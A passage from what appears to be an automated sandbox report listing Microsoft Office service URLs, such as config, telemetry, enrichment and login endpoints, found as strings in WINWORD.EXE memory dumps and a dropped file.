Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/&sC
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallationGZ
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/ds
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/is
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosE
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/mack
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeymx
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeynH6
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://config.edge.skype.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.comK
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://cortana.ai
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://cortana.ai/api
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.aietl
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://cr.office.com
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com)n0
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/Ep
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/ym
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com2p7
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com6m3
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.comMq
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000000.00000000.299221788.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265756794.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://dev.cortana.ai
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev0-api.acompli.net/autodetecttm
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://devnull.onenote.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://directory.services.
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1WQ
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1VP
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/=Ig
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.jsonb
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/fp
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comS
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entity.osi.office.net/t
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech)
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidv.
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://globaldisco.crm.dynamics.comom
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.ppe.windows.net/%
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://graph.windows.net
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://graph.windows.net/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/e
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net:
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com?
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comT
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com~
Source: WINWORD.EXE, 00000000.00000000.290115292.000000000DADE000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1;
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: WINWORD.EXE, 00000000.00000000.290115292.000000000DADE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?Gc
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientM
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstore?
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bingript
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: WINWORD.EXE, 00000000.00000000.299221788.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265756794.000000000D11D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArts.dll_
Source: WINWORD.EXE, 00000000.00000000.299221788.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265756794.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: WINWORD.EXE, 00000000.00000000.299221788.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265756794.000000000D11D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrivey
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://invites.office.com/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://invites.office.com/v
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://lifecycle.office.com
Source: WINWORD.EXE, 00000000.00000000.302831274.000000000DCD1000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267878607.000000000DCD1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/m)
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizeMz
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizes
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://login.windows.local
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localtesB3
